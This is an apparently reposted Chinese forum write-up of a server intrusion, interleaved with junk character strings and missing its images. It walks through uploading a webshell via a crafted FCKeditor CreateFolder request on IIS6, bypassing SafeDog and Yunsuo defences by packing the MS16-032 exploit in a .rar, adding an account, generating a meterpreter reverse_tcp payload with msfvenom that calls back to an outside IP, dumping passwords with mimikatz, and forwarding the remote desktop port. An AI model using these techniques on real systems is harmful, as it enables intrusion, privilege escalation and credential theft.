从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

admin

- D$ Y3 y* G4 S# E! L( Q

! q8 v! T5 V" k3 y# L9 F# ~0 r5 g, m8 [3 P( X5 g+ N h

一、 利用getwebshell篇 首先对目标站进行扫描，发现是asp的，直接扫出网站后台和默认数据库，下载解密登陆如图： 下面进后台发现有fckeditor，而且还是iis6.0的，可以考虑创建个asp目录来构造解析（fck编辑器路径被改成别的需要burpsuite抓包的时候看到） 1 o* Q7 E; L' m# p1 o ) i/ P0 B7 L2 B& |# n' `. P$ a下面我们构造一个asp目录，如： 6 D) x5 u3 o* v8 p: o ! O! r M* L( x, _8 x http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 0 |6 ~, E" G& n$ [9 v) z3 d ) q$ N W- d9 e J( L7 x 然后再给shell.asp目录上传一个jpg图片格式的一句话，然后用hatchet打开，然后看了一下支持aspx，那么我们就用包含的办法先把aspx后缀名改成.rar，然后再创建个111.ASPx，里面包含rar文件，进去以后看进程有云锁和安全狗，那么，那么我们慢慢来，慢慢来。 0 o8 D! q4 |, l# e& ^1 e 7 `' s3 `1 K1 c一、 绕过安全狗云锁提权并且加账号 4 N1 [! R! `0 {, B- E2 G: N1 b * h/ v$ ], U1 a( E. c/ }8 n3 B没法看系统信息，但是根据网站404页面可以断定是2003服务器，然后接着访问C:\Program Files (x86)存在断定是2003 64位系统，那么我们说干就干，我们上传ms16-032 64位直接干，但是发现上传exe或者别的格式exp会自动消失，看进程也没杀毒呀，没错没杀毒，是云锁有个功能防御了，那么突破云锁上传的方法就是利用rar，先把exp打包为64.rar上传，然后我们翻一下rar在哪个目录，在C:\Program Files (x86)，然后开干 . q$ z+ K, r2 W8 T; A3 S* I a! y: O3 {7 @) g如图： % c: f! @$ o9 W$ X 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组，我操后来也想着用getpassword64抓明文密码，但是一执行就卡死，没办法想到了metasploit 2 `5 d- }. v7 D! e j4 z 4 _$ W! f, T8 b1 ~ L& J [一、 利用metasploit 首先用pentestbox生成一个64位的payload如下命令 ) e) b* u: h% @; ?' i" V" Z3 AmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe 0 ~* a, N" @/ M3 Q8 ^# V% Q# o4 I; ~为什么要用443端口，之前我测试用别的端口直接被墙了没法上线，下面我们在system下执行这个mata，上线如图： 下面我们用这个命令抓一下明文密码命令1：use mimikatz 命令2：kerberos如下图： ) e+ B. { h1 t e$ U& ~/ G7 x; W下面我们来做一个监听如下命令： * t8 V: J/ [. T* Q3 a4 c( a portfwd add -l 6655 -p 3968 -r 127.0.0.1，这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图： % e4 ~, s2 ]- ?9 v

6 D! x( ~7 [( N ~! @5 r ]4 w

2 ]3 L" ^4 m0 {& p4 ~2 U / s+ q r& W7 _# r9 }

3 s1 z$ l1 x9 P/ f6 K- W6 s& B: g % K& u- G% x* y( o% T

8 a; H9 t8 Y# Q6 ^! C; |- r

图片怎么都没了